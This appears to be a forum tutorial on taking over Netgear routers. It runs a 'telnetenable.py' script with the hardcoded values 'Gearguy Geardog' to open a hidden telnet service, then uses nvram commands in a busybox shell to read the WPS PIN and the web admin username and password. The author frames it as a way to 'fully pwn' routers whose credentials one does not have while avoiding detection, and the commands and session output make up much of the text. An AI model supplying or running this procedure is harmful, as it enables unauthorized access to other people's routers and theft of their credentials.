One can access a Netgear router's configuration page with a browser and the default admin-password login combination. When this information is not available, the router can be reset with a paperclip, but all settings will be lost, and you risk being detected. A better solution is to use telnet. Most Netgear routers have the telnet service up and running. Even though it is disabled by default, it can be remotely enabled as long as you are connected to the AP. Download the python script (Please login or register with a valid email address to view links / downloads) and execute it as follows, making sure to substitute the router's local IP address, and to enter the router's mac address in all capital letters: python telnetenable.py 192.168.1.1 MACADDRESS Gearguy Geardog Now you can telnet into the router (with this command: telnet 192.168.1.1) and do all kinds of neat things. Below is the output for a WNR1000v3. As you can see, the router is running busybox. The routerinfo command gives a quick overview and also displays the WPS pin. Not all models have the routerinfo command. In that case, press tab to see a list of installed commands, or type busybox. The nvram command allows you to access (and perhaps change) all the settings that are stored in the device's non-volatile memory. Some models use config instead of nvram, but it does the same thing. In order to fully pwn a router, for which you do not have the login credentials, you can use the nvram get http_ commands as shown below. That's how you can quickly get the name and password for the web interface Code: Select All Trying 192.168.1.1... Connected to 192.168.1.1. Escape character is '^]'. BusyBox v0.60.0 (2010.12.01-12:13+0000) Built-in shell (msh) Enter 'help' for a list of built-in commands. # routerinfo Release version : Netgear Wireless Router WNR1000v3 U12H13900/V1.0.2.28/52.0.60NA Time : Dec 1 2010 20:19:46 CFE version : 3.0.6 WSC PIN - XXXXXXXX LAN mac address - 204E7FXXXXXX WAN mac address - 204E7FXXXXXX WLAN mac address - 204E7FXXXXXX Board ID - U12H139T50_NETGEAR serial number - XXXXXXXXXXXXX # nvram get http_username XXXXXXXX # nvram get http_passwd XXXXXXXX The nvram show command shows all variables, including hidden ones that are not available on the web interface. The ls -l command shows you all the files on the router, which is nothing but a small computer. Don't forget to look inside the www directory for hidden pages. Have fun exploring the inner workings of your router.